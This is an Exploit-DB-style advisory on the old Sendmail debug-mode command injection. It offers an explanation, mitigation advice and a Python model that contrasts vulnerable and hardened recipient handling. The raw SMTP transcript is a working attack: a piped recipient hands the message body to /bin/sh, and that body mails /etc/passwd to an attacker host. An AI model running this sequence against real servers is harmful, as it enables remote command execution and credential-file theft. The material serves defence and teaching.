vendor: N/A
by: N/A
CVSS: 8.8 (HIGH)
CWE: 78 (Command Injection)
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A

The sed in the recipient strips all mail headers from the message before passing it on to the shell.

This is a command injection in the mail server's recipient handling, the classic Sendmail debug-mode hole. After the attacker turns on debug mode with the SMTP `debug` command, the server accepts a recipient of the form `"|command"` and treats it not as a mailbox but as a program to pipe the message into. The message is handed to `/bin/sh` with the daemon's privileges (historically root), so whatever the attacker puts in the DATA section is executed on the server. The `mail from: </dev/null>` sender simply sends any bounce nowhere. In the transcript below the body mails `/etc/passwd` back to the attacker; any other command would run the same way, giving the attacker control of the system.

Mitigation:

The `debug` command must be disabled (or compiled out) on any reachable mail server. Recipient addresses received over the network must be validated as plain mailbox addresses and never interpreted as program pipelines; pipe-to-program delivery, if it is needed at all, should only be reachable through locally administered aliases. The mail daemon, and any program it hands a message to, should run under a least-privileged account rather than root, so that a successful injection cannot reach beyond the mail system.
Source

Exploit-DB raw data:

220 mail.victim.com SMTP
helo attacker.com
250 Hello attacker.com, pleased to meet you.
debug
200 OK
mail from: </dev/null>
250 OK
rcpt to:<"|sed -e '1,/^$/'d | /bin/sh ; exit 0">
250 OK
data
354 Start mail input; end with <CRLF>.<CRLF>
mail evil@attacker.com </etc/passwd
.
250 OK
quit
221 mail.victim.com Terminating

The sed in the recipient strips all mail headers from the
message before passing it on to the shell.
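The following is an added example, not part of the original exploit post or of any mail server's code. It models in Python the three things the transcript and the mitigation note turn on: the header-stripping `sed` the body relies on (the MTA prepends its own headers before piping the message into the "recipient" program), a simplified debug-mode recipient resolver beside a hardened one that only accepts plain addresses, and a read-only probe that tells a server that still honours `debug` from one that does not. The recipient parser, the alias table, the fake servers and the queued-message sample are all constructed for illustration; nothing here executes a shell or contacts a real host.

```python
import re

# ---- 1. the header-stripping sed from the exploit -------------------------

def strip_headers(message: str) -> str:
    """Python equivalent of `sed -e '1,/^$/d'`.

    The MTA prepends Received:/From: headers before it pipes the message into
    the "recipient" program, so the sed deletes line 1 through the first empty
    line and only the attacker's body reaches /bin/sh.  With no blank line at
    all, sed's range runs to end of input and nothing survives.
    """
    lines = message.split("\n")
    for i, line in enumerate(lines):
        if line == "":
            return "\n".join(lines[i + 1:])
    return ""


# ---- 2. recipient handling: debug-mode model beside a hardened one --------

# Simplified, hypothetical parser for a program recipient: |cmd or "|cmd".
_PROGRAM_RCPT = re.compile(r'^"?\|(?P<cmd>.+?)"?$')
# Plain mailbox syntax the hardened variant insists on (deliberately strict).
_PLAIN_ADDRESS = re.compile(r"^[A-Za-z0-9._+-]+(@[A-Za-z0-9.-]+)?$")
# Hypothetical locally administered alias table: in the hardened model this is
# the only place a pipe may come from (think aliases / .forward, never RCPT TO).
TRUSTED_ALIASES = {"vacation": "/usr/bin/vacation nobody"}


def _unbracket(rcpt: str) -> str:
    return rcpt.strip().strip("<>")


def resolve_rcpt_vulnerable(rcpt: str, debug_mode: bool) -> tuple:
    """Debug-mode behaviour: the remote peer may name a program as recipient.

    Returns (kind, target); kind "prog" means "run target via /bin/sh with the
    message on stdin", kind "mbox" means ordinary delivery.  Nothing is
    executed here; the tuple is what the MTA would act on.
    """
    rcpt = _unbracket(rcpt)
    m = _PROGRAM_RCPT.match(rcpt)
    if m and debug_mode:
        return ("prog", m.group("cmd"))
    return ("mbox", rcpt)


def resolve_rcpt_hardened(rcpt: str) -> tuple:
    """Hardened: RCPT TO must be a plain address; pipes only via trusted aliases."""
    rcpt = _unbracket(rcpt)
    if not _PLAIN_ADDRESS.match(rcpt):
        return ("reject", "550 recipient address not permitted")
    local_part = rcpt.split("@", 1)[0]
    if local_part in TRUSTED_ALIASES:
        return ("prog", TRUSTED_ALIASES[local_part])
    return ("mbox", rcpt)


# ---- 3. read-only check: does a server still honour DEBUG? ----------------

def server_accepts_debug(send) -> bool:
    """`send(cmd)` writes one SMTP command and returns the reply line.

    A 2xx reply means the server honours DEBUG (vulnerable); a fixed server
    answers 5xx.  Sending the command on its own changes nothing on the host.
    """
    return send("debug")[:1] == "2"


class FakeVulnerableServer:
    """Constructed stand-in that replays the replies from the transcript above."""
    REPLIES = {"helo": "250 Hello, pleased to meet you.", "debug": "200 OK",
               "mail": "250 OK", "rcpt": "250 OK", "quit": "221 Terminating"}

    def send(self, cmd: str) -> str:
        return self.REPLIES.get(cmd.split()[0].lower(), "500 Command unrecognized")


class FakeHardenedServer(FakeVulnerableServer):
    """Same server with DEBUG compiled out."""
    REPLIES = {k: v for k, v in FakeVulnerableServer.REPLIES.items() if k != "debug"}


if __name__ == "__main__":
    rcpt = '<"|sed -e \'1,/^$/\'d | /bin/sh ; exit 0">'
    kind, cmd = resolve_rcpt_vulnerable(rcpt, debug_mode=True)
    # Constructed: the queued message once the MTA has put its own headers in
    # front of the DATA section from the transcript.
    queued = ("Received: from attacker.com\nFrom: </dev/null>\n\n"
              "mail evil@attacker.com </etc/passwd\n")
    print(kind, "->", cmd)
    print("shell receives:", strip_headers(queued).strip())
    print("hardened resolver:", resolve_rcpt_hardened(rcpt))
    print("vulnerable server accepts DEBUG:", server_accepts_debug(FakeVulnerableServer().send))
    print("hardened server accepts DEBUG:", server_accepts_debug(FakeHardenedServer().send))
```

The probe only needs a `send` callable, so against a live host it can be wired to a socket that writes the command and reads one reply line; the resolvers show why the fix is not "sanitize the recipient" but "never let a network peer pick a program", which is what the alias-only rule enforces.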